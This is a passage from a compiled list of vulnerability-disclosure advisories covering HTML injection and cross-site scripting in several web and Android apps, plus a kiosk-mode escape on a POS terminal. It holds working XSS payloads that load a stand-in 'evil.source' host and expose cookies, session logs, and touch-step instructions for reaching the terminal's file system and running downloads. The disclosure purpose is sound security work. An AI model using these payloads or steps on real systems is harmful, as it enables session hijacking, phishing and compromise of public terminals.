and encode of the vulnerable title and description parameters. Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks. Security Risk: ============== The security risk of the persistent input validation web vulnerability in the application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
  12. # Exploit Title: Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities References (Source): https://www.vulnerability-lab.com/get_content.php?id=2278 Release Date: 2023-07-04 Vulnerability Laboratory ID (VL-ID): 2278 Common Vulnerability Scoring System: 5.4 Product & Service Introduction: =============================== https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432 Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application. Affected Product(s): ==================== ActiveITzone Product: Active Super Shop CMS v2.5 (CMS) (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-08-20: Researcher Notification & Coordination (Security Researcher) 2021-08-21: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2023-07-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple html injection web vulnerabilities has been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application. The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content. The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module. Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on profile view or products preview listing. There are 3 different privileges that are allowed to access the backend like the accountant (low privileges), the manager (medium privileges) or the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and manager on preview of the elements in the backend to compromise the application. The request method to inject is post and the attack vector is persistent located on the application-side. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Manage Details Vulnerable Parameter(s): [+] name [+] phone [+] address Affected Module(s): [+] manage profile [+] products branding Proof of Concept (PoC): ======================= The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Exploitation: Payload <img src="https://[DOMAIN]/[PATH]/[PICTURE].*"> Vulnerable Source: manage_admin & branding <div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;"> <div class="panel-heading"> <h3 class="panel-title">Manage Details</h3> </div> <form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/" class="form-horizontal" method="post" accept-charset="utf-8"> <div class="panel-body"> <div class="form-group"> <label class="col-sm-3 control-label" for="demo-hor-1">Name</label> <div class="col-sm-6"> <input type="text" name="name" value="Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required"> </div></div> <div class="form-group"> <label class="col-sm-3 control-label" for="demo-hor-2">Email</label> <div class="col-sm-6"> <input type="email" name="email" value="[email protected]" id="demo-hor-2" class="form-control required"> </div></div> <div class="form-group"> <label class="col-sm-3 control-label" for="demo-hor-3"> Phone</label> <div class="col-sm-6"> <input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control"> </div></div> --- PoC Session Logs (POST) --- https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/ Host: assm_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html, */*; q=0.01 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680 Content-Length: 902 Origin:https://assm_cms.localhost:8080 Connection: keep-alive Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/ Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1 - POST: HTTP/3.0 200 OK content-type: text/html; charset=UTF-8 ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly https://assm_cms.localhost:8080/shop/admin/manage_admin/ Host: assm_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Reference(s): https://assm_cms.localhost:8080/shop/ https://assm_cms.localhost:8080/shop/admin/ https://assm_cms.localhost:8080/shop/admin/manage_admin/ https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/ Solution - Fix & Patch: ======================= Disallow inseration of html code for input fields like name, adress and phone. Sanitize the content to secure deliver. Security Risk: ============== The security risk of the html injection web vulnerabilities in the shopping web-application are estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
  13. Exploit Title: PaulPrinting CMS - (Search Delivery) Cross Site Scripting References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2286 Release Date: ============= 2023-07-17 Vulnerability Laboratory ID (VL-ID): ==================================== 2286 Common Vulnerability Scoring System: ==================================== 5.2 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Product & Service Introduction: =============================== PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface. (Copy of the Homepage:https://codecanyon.net/user/codepaul ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the PaulPrinting (v2018) cms web-application. Vulnerability Disclosure Timeline: ================================== 2022-08-25: Researcher Notification & Coordination (Security Researcher) 2022-08-26: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Open Authentication (Anonymous Privileges) User Interaction: ================= Medium User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A client-side cross site scripting vulnerability has been discovered in the official PaulPrinting (v2018) cms web-application. Remote attackers are able to manipulate client-side requests by injection of malicious script code to compromise user session data. The client-side cross site scripting web vulnerability is located in the search input field with the insecure validated q parameter affecting the delivery module. Remote attackers are able to inject own malicious script code to the search input to provoke a client-side script code execution without secure encode. The request method to execute is GET and the attack vector is non-persistent. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Request Method(s): [+] GET Vulnerable Module(s): [+] /account/delivery Vulnerable Input(s): [+] Search Vulnerable Parameter(s): [+] q Affected Module(s): [+] /account/delivery [+] Delivery Contacts Proof of Concept (PoC): ======================= The non-persistent xss web vulnerability can be exploited by remote attackers with low privileged user account and medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Example https://codeawesome.in/printing/account/delivery?q= PoC: Exploitation https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)> --- PoC Session Logs (GET) --- https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)> Host: codeawesome.in Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Cookie: member_login=1; member_id=123; session_id=25246428fe6e707a3be0e0ce54f0e5bf; - GET: HTTP/3.0 200 OK content-type: text/html; charset=UTF-8 x-powered-by: PHP/7.1.33 Vulnerable Source: (Search - delivery?q=) <div class="col-lg-8"> <a href="https://codeawesome.in/printing/account/delivery" class="btn btn-primary mt-4 mb-2 float-right"> <i class="fa fa-fw fa-plus"></i> </a> <form class="form-inline mt-4 mb-2" method="get"> <div class="input-group mb-3 mr-2"> <input type="text" class="form-control" name="q" value="a"><iframe src="evil.source" onload="alert(document.cookie)">"> <div class="input-group-append"> <button class="btn btn-outline-secondary" type="submit" id="button-addon2"><i class="fa fa-fw fa-search"></i></button> </div></div> Security Risk: ============== The security risk of the cross site scripting web vulnerability with non-persistent attack vector is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
  14. #Exploit Title: Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2317 Release Date: ============= 2023-07-04 Vulnerability Laboratory ID (VL-ID): ==================================== 2317 Common Vulnerability Scoring System: ==================================== 5.1 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection. No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s. (Copy of the Homepage:https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application. Affected Product(s): ==================== Product Owner: dooblou Product: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-01-19: Researcher Notification & Coordination (Security Researcher) 2022-01-20: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple input validation web vulnerabilities has been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application. The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-application requests from the application-side. The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The requested content via get method request is insecure validated and executes malicious script codes. The attack vector is non-persistent and the rquest method to inject is get. Attacker do not need to be authorized to perform an attack to execute malicious script codes. The links can be included as malformed upload for example to provoke an execute bby a view of the front- & backend of the wifi explorer. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Proof of Concept (PoC): ======================= The input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction. For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue. PoC: Exploitation http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK PATH TO RETURN INDEX</a> http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3 http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3 http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX Vulnerable Sources: Execution Points <table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><td style="vertical-align:top;"><table style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><center><span class="doob_large_text">ERROR</span></center></td></tr></tbody></table><br><tabl e style="background-color: #B2B2B2; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"> <tbody><tr><td><span class="doob_medium_text">Cannot find file or directory! /storage/emulated/0/Download/<a href="https://evil.source" onmouseover="alert(document.domain)"><br>PLEASE CLICK USER PATH TO RETURN INDEX</a></span></td></tr></tbody></table><br><span class="doob_medium_text"><span class="doob_link">&nbsp;&nbsp;<a href="/">>>&nbsp;Back To Files&nbsp;>></a></span></span><br></td></tr></tbody></table><br> - <li></li></ul></span></span></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr> <td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST"> <input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td> <table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;</span></td><td style="white-space: nowrap;vertical-align:middle" align="right"><span class="doob_small_text_bold"> &nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"> <img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"> <img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN I - <td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();">&nbsp;&nbsp;<a class="doob_button" href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source" onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();" style="">Download</a>&nbsp;<a class="doob_button" href="javascript:setMultiSelectConfirm('Are you sure you want to delete? This cannot be undone!', '/storage/emulated/', 'action', '13&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a>&nbsp; <a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy", "/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source" onmouseover=alert(document.domain)>", "name");javascript:document.multiSelect.submit();' style="">Create Copy</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td> <td align="right" style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view=23&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view=38&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;</span></td></tr></table> ---PoC Session Logs --- http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E GET: HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml - http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)><br>PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3 Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: treeview=0 Upgrade-Insecure-Requests: 1 GET: HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html - http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source" onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E GET: HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml Security Risk: ============== The security risk of the multiple web vulnerabilities in the ios mobile wifi web-application are estimated as medium.
  15. Exploit Title: Webile v1.0.1 - Multiple Cross Site Scripting References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2321 Release Date: ============= 2023-07-03 Vulnerability Laboratory ID (VL-ID): ==================================== 2321 Common Vulnerability Scoring System: ==================================== 5.5 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data, statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac, Windows, Linux, iOS, Android and other multi-platform operating systems. (Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application. Affected Product(s): ==================== Product Owner: Webile Product: Webile v1.0.1 - (Framework) (Mobile Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-10-11: Researcher Notification & Coordination (Security Researcher) 2022-10-12: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-03: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own malicious script codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Parameter(s): [+] new_file_name [+] i Proof of Concept (PoC): ======================= The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Vulnerable Source: Send Send message to phone listing <div class="layui-colla-item"> <div class="layui-card-header">Message</div> <div class="layui-colla-content" style="display:block;padding-left:16px;"> <div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;" title="Copy" onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br> <span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div> </div></div></div> history logs messages <table class="layui-table layui-form"> <thead><tr> <th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center"> <input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th> <th style="border-right-width:1px;">Message</th> <th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th> <th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr> </thead> <tbody><tr> <td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center"> <input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div> </td> <td style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td> <td align="center">2022/07/17 20:10</td> <td class="td-manage" style="border-right-width:1px;text-align:center;"> <a title="Copy" onclick="copy(3)" href="javascript:;"> <i class="iconfont">&nbsp;&nbsp;</i> </a> <a title="Delete" onclick="deleteLog(this,3)" href="javascript:;"> <i class="layui-icon">&nbsp;&nbsp;</i> </a></td></tr></tbody></table> --- PoC Session Logs #1 (POST) --- (Add) http://localhost:8080/file_action Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 210 Origin:http://localhost:8080 Connection: keep-alive Referer:http://localhost:8080/webile_files Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"} - POST: HTTP/1.1 200 OK Content-Type: application/json Connection: keep-alive Content-Encoding: gzip Transfer-Encoding: chunked - http://localhost:8080/evil.source Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8080/webile_files Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Content-Type: application/octet-stream Connection: keep-alive Content-Length: 0 - Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 --- PoC Session Logs #2 (POST) --- (Send) http://localhost:8080/send Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 180 Origin:http://localhost:8080 Connection: keep-alive Referer:http://localhost:8080/webile_send Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"} - POST: HTTP/1.1 200 OK Content-Type: application/json Connection: keep-alive Content-Encoding: gzip Transfer-Encoding: chunked - http://localhost:8080/evil.source Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8080/webile_send Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Content-Type: application/octet-stream Date: Sun, 17 Jul 2022 18:08:33 GMT Connection: keep-alive Content-Length: 0 Security Risk: ============== The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.
  16. Exploit Title: Aures Booking & POS Terminal - Local Privilege Escalation References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2323 Release Date: ============= 2023-07-17 Vulnerability Laboratory ID (VL-ID): ==================================== 2323 Common Vulnerability Scoring System: ==================================== 7.2 Vulnerability Class: ==================== Privilege Escalation Current Estimated Price: ======================== 3.000€ - 4.000€ Product & Service Introduction: =============================== KOMET is an interactive, multifunctional kiosk and specially designed for the fast food industry. Available as a wall-mounted or freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner. With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to manage customer cards and promotions. Queue management can also be optimized. (Copy of the Homepage:https://aures.com/de/komet/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. Affected Product(s): ==================== Aures Technologies GmbH Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise) Vulnerability Disclosure Timeline: ================================== 2023-05-09: Researcher Notification & Coordination (Security Researcher) 2023-07-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Local Severity Level: =============== High Authentication Type: ==================== Open Authentication (Anonymous Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. The security vulnerability allows local attackers to bypass the kiosk mode to compromise the local file system and applications. It is possible for local attackers to escalate out of the kiosk mode in the aures komet booking & pos terminal. Local attackers are able to use the touch functionalities in the aures komet booking & pos terminal system to escalate with higher privileges. The security vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with restricted low local privileged access to the booking service front display are able to execute files, can unrestricted download contents or exfiltrate local file-system information of the compromised windows based operating system. No keyboard or connections are required to manipulate the service booking and payment terminal. The booking and payment terminal system vulnerability requires no user user interaction to become exploited and can only be triggered by local physical device access. Vulnerable Operating System(s): [+] Windows 10 (IoT Enterprise) Affected Component(s): [+] Context Menu Affected Function(s): [+] Web Search [+] Share (Teilen) Proof of Concept (PoC): ======================= The local vulnerability can be exploited by local attackers with physical device access without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Sheet Touch Display => Select Food Item => Highlight Text => Open Context Menu => Extend Context Menu => Web-Search => Browser => Local File System => Compromised! Manual steps to reproduce the vulnerability ... 01. First touch the monitor display to move on from standby 02. Select an food item from the menu of immergrün (we recomment the cesar wraps) 03. Push the information button of the selected food item 04. Push twice via touch to mark the selected food item text 05. Press a third time after you have marked the context by holding it down on the touch display 06. Now the function context menu of the operating system for highlighted text appears 07. On the context menu appearing 3 dots to extend the visible function menu 08. Select the web-search or share function for the highlighted content in the context menu 09. The browser of the operating system opens on the main front screen 10.1 By now you are able to download an execute executables using the browser without any blacklisting (Unrestricted Web Access - Download of Files) 10.2 Attackers can open websites on the fron display to manipulate the visible content (Scam & Spam - Web Messages & Web Context) 10.3 Attackers are able to manipulate via browser debugger the web content displayed from immergrün (Phishing - Formular & Banking 